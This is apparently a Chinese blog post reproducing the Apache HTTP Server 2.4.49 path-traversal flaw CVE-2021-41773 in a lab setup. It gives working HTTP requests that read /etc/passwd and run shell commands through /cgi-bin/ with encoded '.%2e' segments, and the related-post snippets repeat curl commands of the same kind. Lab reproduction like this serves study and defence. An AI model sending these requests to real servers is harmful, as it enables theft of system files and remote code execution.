Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)

最新推荐文章于 2024-05-15 21:32:19 发布
最新推荐文章于 2024-05-15 21:32:19 发布
阅读量268 收藏
点赞数 2
分类专栏: apache漏洞 文章标签: apache http 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/136316038
版权

Apache HTTP 服务器项目旨在为现代操作系统(包括 UNIX 和 Windows)开发和维护开源 HTTP 服务器。

在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“require all denied”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程执行代码。

复现:

访问漏洞环境页面:http://192.168.92.130:8080/

使用burpsuite抓包

GET / HTTP/1.1
Host: 192.168.92.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=.eJwNy0EOgyAQBdC7_LULZwSCXIagzqRNFc2Aq6Z3r9uXvC-ymrQXkpa9yYB8iR2lSu1I3e5H1maa-_mRigSe5o2CBOc9TxyXwkpEMir5pawcPMXZjS5iwN3E8nt7EuH3B_XcH6c.ZdXEjg.NIfTQnKMqwMNecoSNiQOPfMb7bU
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
If-None-Match: "2d-432a5e4a73a80"

发送到重发器,进行改包操作

改变GET请求,代码如下:

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

 

路径穿越成功

进行RCE代码执行

修改成POST请求,执行代码如下:

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1


echo; ls

执行成功

青梅fox
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Apache HTTP Server 2.4.49 路径遍历文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 3894
Apache HTTP Server 2.4.49 路径遍历文件泄露漏洞 (CVE-2021-41773)复现实验报告
Apache 2.4.49 路径穿越漏洞复现(CVE-2021-41773
qq_51163834的博客
05-31 276
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。启动环境前要先到对应的目录。如本次对CVE-2021-41773漏洞进行复现,先到vulhub/httpd/CVE-2021-41773目录下启动环境。首次尝试要先安装docker、docker-compose、vulhub。Burpsuite,获取passwd文件内容。反弹shell。Burpsuit下输出当前用户。
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 3433
一、漏洞描述 Apache HTTP Server 2.4.50 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 2837
ApacheHTTPServerApache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
[间件漏洞]apache漏洞复现
紫洋的博客
05-25 1021
2.4.0~2.4.29版本存在 一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。Apache默认一个文件可以有多个以点分割的后缀,当最右边的后缀无法识别,则继续向左识别,直到识别到合法后缀才进行解析。最后一个后缀名为.jpg,合法,因为文件名info.php.jpg包含.php,所以解析为php文件。在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀。先创建文件文件内容为phpinfo。
间件漏洞Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 631
CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞CVE-2021-41773CVE-2021-42013 ⑥CVE-2021-40438
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
weixin_64655821的博客
10-13 1967
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在内存...
【Web安全】文件上传漏洞
RexHa的博客
12-04 3499
目录1. 文件上传漏洞概述1.1 FCKEditor文件上传漏洞1.2 绕过文件上传检查功能2. 功能还是漏洞2.1 Apache文件解析2.2 IIS文件解析2.3 PHP CGI路径解析2.4 利用上传文件钓鱼 3. 设计安全的文件上传功能文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力。应用:例如上传一张图片、分享一段视频、论坛发帖时附带附件、发邮件时附带附件……文件上传后导致的安全问题一般有:FCKEditor是一款非常流行的富文本编辑器,其上传文件的功能能
漏洞复现】Apache HTTP Server 2.4.492.4.50 RCE(CVE-2021-41773
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-22 796
Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49的一个路径遍历文件泄露漏洞CVE-2021-41773)。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
weixin_47311099的博客
12-07 1908
Apache HTTP Server 2.4.49 路径穿越漏洞复现(CVE-2021-41773Apache HTTP ServerApache基金会开源的一款流行的HTTP服务器。在其2.4.49版本,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
Apache 服务器存在高危提权漏洞,请升级至最新版本 2.4.39
cpongo5
04-05 2327
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> Apache HTTP 服务器于4月...
【Linux深度学习笔记5.13(Apache)】
最新发布
weixin_46559428的博客
05-15 281
虚拟主机:将多个网站放在一台服务器上。web服务器都可以实现。三种:基于域名 基于端口 基于Ip(300M/9w/1y)​ 默认 : 允许所有。​ 允许一部分。
cve-2021-41773漏洞复现
06-28
### 回答1: cve-2021-41773漏洞Apache HTTP Server的一个安全漏洞,攻击者可以利用漏洞在未经授权的情况下访问服务器上的文件。 要复现该漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4.49或更早版本。 2. 创建一个名为“test”的目录,并在其创建一个名为“test.txt”的文件。 3. 启动Apache HTTP Server,并访问以下URL:http://localhost/test/.%2e/%2e%2e/%2e%2e/%2e%2e/test.txt 4. 如果服务器返回“HTTP/1.1 200 OK”响应,则表示漏洞存在,攻击者可以访问服务器上的任何文件。 需要注意的是,该漏洞只影响Apache HTTP Server 2.4.49及更早版本,如果您使用的是更新版本的Apache HTTP Server,则不受此漏洞的影响。同时,为了保护服务器的安全,建议及时更新Apache HTTP Server的版本。 ### 回答2: cve-2021-41773漏洞是一种存在于Apache HTTP Server 2.4.49以前版本的目录遍历漏洞,攻击者可以通过构造恶意的GET请求来访问并读取目标服务器上没有授权读取权限的文件,例如 /usr/local/apache/logs/error.log。 这个漏洞的复现非常简单,只需要使用curl或者其他工具向目标服务器发起恶意的GET请求,即可获取目标服务器上的敏感信息。 首先需要确定目标服务器上是否安装了Apache HTTP Server,并且确认目标服务器的版本是否在2.4.49以前。可以使用nmap等端口扫描工具扫描目标服务器上是否开放了HTTP服务,并尝试访问目标服务器上的默认页面,确认是否安装了Apache HTTP Server。 如果确定目标服务器上存在Apache HTTP Server,并且版本较低,则可以使用curl等工具向目标服务器发起以下恶意请求: curl -v http://<target_ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 其,<target_ip>需要替换为目标服务器的IP地址,上述请求会尝试访问目标服务器上的/etc/passwd文件。如果能够获取到文件内容,则说明漏洞复现成功。 防范这个漏洞,首先需要及时升级Apache HTTP Server的版本,避免漏洞被攻击者利用。其次,可以使用Web应用程序防火墙(WAF)等安全工具来阻止滥用漏洞的请求,减少漏洞被攻击的风险。最后,建议对服务器配置进行加固,避免敏感文件被访问。 ### 回答3: cve-2021-41773漏洞是一个Apache HTTP Server的安全漏洞,可通过发送特制的HTTP请求来导致服务器上已经存在的目录结构泄露。该漏洞可能会公开网站上存在的私人和敏感信息,并为攻击者进一步攻击网站提供有关目标的有用信息。此漏洞的影响范围很广,可能影响许多版本的Apache HTTP Server。 要复现这个漏洞,我们需要在本地搭建一台Apache HTTP Server并设置虚拟主机。 在此之前,我们需要确保已经安装了Apache HTTP Server,如果没有安装Apache HTTP Server,可以通过以下命令在Ubuntu上安装: sudo apt-get update sudo apt-get install apache2 安装完成后,我们需要设置虚拟主机。在此例,我们将使用名为example.com的虚拟主机。我们可以通过以下步骤进行设置: 1. 创建一个名为example.com的目录: sudo mkdir /var/www/example.com 2. 将权限设置为Apache用户: sudo chown -R www-data:www-data /var/www/example.com 3. 在我们刚创建的目录创建一个名为index.html的文件: sudo nano /var/www/example.com/index.html 输入一些HTML代码,例如“ Hi there!” 保存并关闭文件。 4.创建一个apache虚拟主机配置文件: sudo nano /etc/apache2/sites-available/example.com.conf 在配置文件添加以下行,以配置虚拟主机: <VirtualHost *:80> ServerAdmin [email protected] DocumentRoot /var/www/example.com ServerName example.com ServerAlias www.example.com <Directory /var/www/example.com> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> 保存并关闭文件。 5. 禁用默认虚拟主机: sudo a2dissite 000-default.conf 6. 启用新虚拟主机: sudo a2ensite example.com.conf 7. 配置Apache HTTP Server: sudo service apache2 reload 现在我们已经设置了虚拟主机,我们可以开始测试漏洞。我们可以使用curl发送一个特制的HTTP请求来尝试获取服务器上的文件和目录结构。如下所示: curl -v http://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 上面的请求意味着我们正在请求服务器上的“/etc/passwd”文件,这是一个包含用户的帐号信息的文件。执行上面命令后,我们将看到类似以下内容的响应: ... < HTTP/1.1 200 OK < Accept-Ranges: bytes < Content-Length: 266 < Connection: close < Content-Type: text/plain ... root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... ... 在上面的响应我们可以看到给出的是服务器上的用户的帐户信息,这表明我们已经成功地利用漏洞获取了服务器上的敏感信息。 攻击者可以进一步利用此信息对系统进行攻击。此外,在通过Apache HTTP Server公开网站的时候,最好配置适当的安全策略以确保保证系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值